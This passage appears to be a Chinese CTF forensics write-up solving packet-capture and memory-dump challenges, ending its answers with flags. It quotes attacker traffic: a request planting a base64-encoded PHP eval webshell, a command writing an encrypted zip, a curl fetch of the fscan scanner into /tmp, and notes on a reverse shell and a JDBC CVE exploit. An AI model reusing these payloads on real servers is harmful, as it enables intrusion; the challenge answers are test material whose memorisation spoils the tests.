f47cdf33175b3f2e4ce6823b93da33dfa3f239b8357fbb78fb73e4f120cae3678e0e36cf56b364f3d4f92bc6130f4d75a12875b3537c542ec0b568abb1cdf166af0e76a9fdf3ed51e4b2c54e93e7ff7ab8f86ed551c9b9c95b7fb6563d1cf79b293c879f65a6af16166d5d4bee2f44ce6e06bf9ed1e60c6f4f9d1cf2e4d1b1d4ceadec0f6373a2bfe4523a5eb9a32e7a067bb19f89a383de4c8a322dc3fe7676d57a5abe2966a55abaafb2e235c271934ff30d73b19ccecbba8cef62af0bee4d7affea554a8eefd1dfaa6ef4755d6df54cbd78717479c7af8bdf31c0c6e151fdd4e3535da8fdceeef6995e2aba35cf467b0ceb33db6b67ed2a2e8af12c2f1cb5475154bb6bf17de85d63eb7d4bd0545c7e1bebfe42ec54bd9ab8bd755fcf71ffe4b48773762c659b97c4d958f76d398c4d83fd25978ad307eb75d3a8b1383ca8575696a9f566d23539a757ad39415545e9ca48baeaca58c74fc2fba6f619be5f2e963351ccc3a6607bd2bbee9b8bc36e95475b851b671ac51b878b4edf3dc07607eba71e9fea476dbbd51ec3e64ca3e87626570e0bd415cded3a958bbd4bd0500c65355b4d5d137c697573e0a668f7524bffe43487737a2ced91aca4e0b2f96d05fd2517cedf51f5c116cd0c2f929a632a8a359b3be8f145d9de9e5b2b5db5deec95dedc4155b71a3a5a7baaef978bdb23a3e2faf97039b18b3a8ba2c589f193c5f52d5456b1bcc16e67ca8a9b4bb9eddca838daaa25a58ba3d783cdded5073868b438aa9ecac1b2fea2e8f570d9e2a22b83de1771e38f41f33faf6a137a6292bb6772e5b844c338848dbcbb30bda21d9c29d9bd0415e51b1bfd0369ad65399bf3ccd7277850d6715da569406bd5c9a9b96b2c453716b7cac6e12cdf2eef2f593a7947b5065b34b35f4d517053f23ac5477dbe98d664adbd6acd4acb42b3f2eed9f6a0af7bd7523db3fa54dff9e7c5e1d8f0a3fe60f1116ee6a8a87338fae7e3ef60f9de7cd1d85cedf80db3bf7f2f7f00622a305b4dfcad138be365d7e637bd569d2b8b37577ed9efb1db651545d953031c345b6c9cea9feac5c8c7c2d3248e1f986c9b6ab8f4e03aff974ba3dea9a349ee9ec985a285d5b2df23b51d55562b598e767f09a6c10e37c1347debdbb7730d468b399b6a1ca76da7cd9b8e3b70ad3539af18cbf55e195c3a595454169c475cb459f6adbf6461ff8eea1dec623455b7cacbdb66507d1ebb2767a3b56a8b3a97155c4e1c3fdd5745458d399d5c8bed9579896ffef9e2cd9f4c74e6a85a7251368d35ca5e6cbe61732bbd5a90e2839f8adaad3259df17cd5a566f9e9c19e0a0afc5e254ff54ef8c7cdd5443f3fa674df2d2cedb50c5a8572ddf23b51d55562dd9bf043b0b706610bb933b5a0ca3dabd450777d7bf35394f1a4bb37f9345c7da05d7cbd65ff2a6b8a452a673b07b43991595f73c8fdd93b392ebd6a3291a5d56b07357d566adecd95e4faed53667fe55be612e0e965fc91a5eeb34ff478dc3edb158fb55d9a2b1e2bd8bc2f03aaef624ded6adb220eb2627956a5a43be58fe318d51a327dd03dc6db179aa7faa6b7d1ef4deb2f587746ab0a2779207bd337953f4a4b7f33bda9bc85aab64e712d46ee08391d62cee84f5dcd5ea3b7307ae3587fc9cb14cc6fe556adb56b7bda786a154dbec2f79b17f47750eb6a8a4655579c7f3d83d39a5f62ddd5cf67ae79b4f7751ba3261716d6fb7d02b7c552ede617a63bbf981c4c25c742ebb7b97ce2527f3a18a5b153b0b3257d2d7c396b98aa33ae6520f35b5e35ced73e9c17ce08cf9cac97c68cf5cb2a3ec5cee5553f46abdbd9fcb8de6238feba96f2ef3d4e99dab1ccd471e31d7349a8fd4cd653a9a9c0b3e67cc735da3f9c8b3ccb50ee603157381d17ce425e62626f3a147f46cc3aff18d73f15ebbb1d8ab7cc1bef7d20a80a72bbf9db4f79ec44bbc752e0e13f7b1fca596e51b208fbcca287fd4fffa6501f8bd8a776cbffea7c577cfc5cc5df94580d9c3b339bc60f9b8d42b1701beccb4b70fbbefeee7baaff3537271e5decff001f8e5defbf3c5f15750c7df95898ff1f5854804e04e3ff07b37007037b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c8450008b9080021170120e42200845c0480908b0010721100422e0240c84500b8faefbfff033636cea9897e59590000000049454e44ae426082'    binary_data = hex_to_bytes(hex_data)    picture_directory = '../'ifnot os.path.exists(picture_directory):        os.makedirs(picture_directory)    image_file_path = os.path.join(picture_directory, 'test.jpg')    save_bytes_as_image(binary_data, image_file_path)    print('图片保存成功：')if __name__ == '__main__':    main()

然后就得到了图片的源码，我们直接拿着源码把图片转出来即可：

得到这张图片……还是图片的隐写喽，测试各种办法后发现是宽高的隐写：

这流量分析还结合上MISC了……

答案：flag3{8f0dffac-5801-44a9-bd49-e66192ce4f57}

六、数据分析-EW

1、ez_web_1

题目内容：服务器自带的后门文件名是什么？（含文件后缀）

tcp流的10062：

POST /e/public/ViewClick/ViewMore.php HTTP/1.1Host: 192.168.162.130:82User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 117Origin: http://192.168.162.130:82Connection: keep-aliveReferer: http://192.168.162.130:82/e/public/ViewClick/ViewMore.phpCookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8Upgrade-Insecure-Requests: 1a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3BHTTP/1.1 200 OKServer: nginxDate: Sun, 29 May 2022 16:41:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzip

URL解码后发现是在写入一句话木马……

答案：ViewMore.php

2、ez_web_2

题目内容：服务器的内网IP是多少？

TCP流的10098：

攻击者利用木马执行了ifconfig命令吗，服务器响应：

分别两张网卡的IP：192.168.162.130和192.168.101.132

那么内网IP只能是192.168.101.132

3、ez_web_3

题目内容：攻击者往服务器中写入的key是什么？

还是tcp流的10098，翻到最下面有这样一个请求：

把请求体单独摘出来解码：

cmd=file_put_contents%28%27k3y_f1le%27%2C+base64_decode%28%27UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl%2FO%2FAJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI%2FABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA%3D%3D%27%29%29%3B->cmd=file_put_contents('k3y_f1le', base64_decode('UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl/O/AJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI/ABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA=='));

里面的base64编码解出来是乱码，但是文件头是PK，猜测有可能是压缩包，导出来看看：

解压需要密码，找吧……

还是这个流，往上面翻找到了攻击者执行的：cat /passwd

服务器返回了7e03864b0db7e6f9

猜测这个就是密码，解压试试：

解压成功，拿到key：7d9ddff2-2d67-4eba-9e48-b91c26c42337

七、数据分析-BF

1、baby_forensics_1

题目内容：磁盘中的key是多少？

查看文件列表：

导出这个文件：

E96<6J:Da6g_b_f_gd75a3d4ch4heg4bab66ad5d

扔随波逐流：

Rot47得到：thekeyis2e80307085fd2b5c49c968c323ee25d5

答案：2e80307085fd2b5c49c968c323ee25d5

2、baby_forensics_2

题目内容：电脑中正在运行的计算器的运行结果是多少？

首先肯定是要把calc.exe这个进程导出来：

python2 vol.py --plugin=volatility2_plugin -f C:UsersAdministratorDesktopbaby_forensics.raw --profile=Win7SP1 x64 memdump -p 2844 -D ./

但是导出来后不知道怎么办了……

查了教程真是学到了，后缀改成.data，然后用GIMP打开：

就得到了这个图片，但是老实说不知道位移、宽度、高度三个数据是怎么来的……

从图片中看到：7598632541

3、baby_forensics_3

题目内容：该内存文件中存在的flag值是多少？

这个实在不知道，看了writeup：

flag在这个文件里：StickyNotes.snt

导出来：

得到一串加密文字：U2FsdGVkX195MCsw0ANs6/Vkjibq89YlmnDdY/dCNKRkixvAP6+B5ImXr2VIqBSp94qfIcjQhDxPgr9G4u++pA==

同时找到了这个文件：i4ak3y

导出这个文件得到：qwerasdf

AES在线解密：

flag{ad9bca48-c7b0-4bd6-b6fb-aef90090bb98}

八、数据分析-TP

1、tcpdump_1

攻击者通过暴力破解进入了某Wiki 文档，请给出登录的用户名与密码，以:拼接，比如admin:admin

那么我们过滤：http contains "/login"，然后查看所有请求，找到登录成功的……

最后在tcp流的1323中：

用户名密码是：TMjpxFGQwD/123457

2、tcpdump_2

攻击者发现软件存在越权漏洞，请给出攻击者越权使用的cookie的内容的md5值。（32位小写）

网站的认证页面应该是这个：

那么我们搜索这个页面：http contains "selfInfoWithAuth"

然后直接过滤出来了两个流量包，第一个分析后不是，第二个追踪流是1585号：

发现服务器的响应码是200，那就确定是了：

accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2md5->ad9bb6c712266661c035c81455a3bb65

但是提交竟然不对，看了writeup发现应该是userid=1

accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1md5->383c74db4e32513daaa1eeb1726d7255

3、tcpdump_3

攻击使用jdbc漏洞读取了应用配置文件，给出配置中的数据库账号密码，以:拼接，比如root:123456

过滤：tcp contains "jdbc"，然后分析到tcp流的1600：

账号密码：zyplayer:1234567

4、tcpdump_4

攻击者又使用了CVE漏洞攻击应用，执行系统命令，请给出此CVE编号以及远程EXP的文件名，使用:拼接，比如CVE-2020-19817:exp.so

tcp流的1612，在里面看到了反弹shell的命令：

应该就是这个EXP了：custom.dtd.xml

过滤出这个exp的所有流量包：tcp contains "custom.dtd.xml"

然后找到了tcp流的1602：

搜索这个语句应该就找到对应的CVE了：

答案：CVE-2022-21724:custom.dtd.xml

5、tcpdump_5

给出攻击者获取系统权限后，下载的工具的名称，比如nmap

追踪tcp流的1611：

清楚看到这条命令：

curl https://github.com/shadow1ng/fscan/releases/download/1.8.2/fscan_amd64 -o /tmp/mysql_bakup

攻击者下载了：fscan

九、数据分析-HD

1、hacked_1

admIn用户的密码是什么？

首先过滤http的请求，然后翻一下看到了这个：

请求了/login页面，并且服务器返回了302 found，那么这个应该就是登录请求了，追踪流看一下：

确定是登录请求，但是用户名和密码加密了，找加密算法吧……往前翻，找到tcp.stream eq 0的地方，看到了：

把这段脚本拿出来：

<script language="javascript">    crypt_key = 'l36DoqKUYQP0N7e1';  crypt_iv = '131b0c8a7a6e072e';var key = CryptoJS.enc.Utf8.parse(crypt_key); var iv = CryptoJS.enc.Utf8.parse(crypt_iv); functionEncrypt(word){    srcs = CryptoJS.enc.Utf8.parse(word);var encrypted = CryptoJS.AES.encrypt(srcs, key, { iv: iv,mode:CryptoJS.mode.CBC,padding: CryptoJS.pad.Pkcs7});return encrypted.toString();  }functionprint(){var a = Encrypt(myform.username.value);var b = Encrypt(myform.password.value);    $.post({url:"/login",data:'post',dataType:'application/x-www-form-urlencoded',data:"username="+a+"&password="+b,success:function(data) {   alert(data)if(data == 'aaa') {     alert("............")window.location.href="/index";    } else {     alert("............")    }   }  })  }   </script>

有了加密算法，就可以对密文进行解密了，一个个分析：

tcp流的56：

用户名密码解密：admIn/flag{WelC0m5_TO_H3re}

2、hacked_2

app.config['SECRET_KEY']值为多少？

先过滤包含SECRET_KEY的流量包：tcp contains "SECRET_KEY"：

得到两个流量包，一个一个看，在tcp流的68看到了：

SECRET_KEY：ssti_flask_hsfvaldb

3、hacked_3

flask网站由哪个用户启动？

我去，这个是真没想到啊……

启动的用户在JWT数据中，密钥就是上个题的SECRET_KEY……

一个个解密所有的JWT：

（解密教程看这里：https://www.cnblogs.com/meraklbz/p/18280537）

tcp流的76：

把set-cookie解密：

请求包中执行了whoami，返回包中返回了red

答案就是：red

4、hacked_4

攻击者写入的内存马的路由名叫什么？（答案里不需要加/）

tcp流的81，解密其Cookie：

那就是这个了，路由就是：Index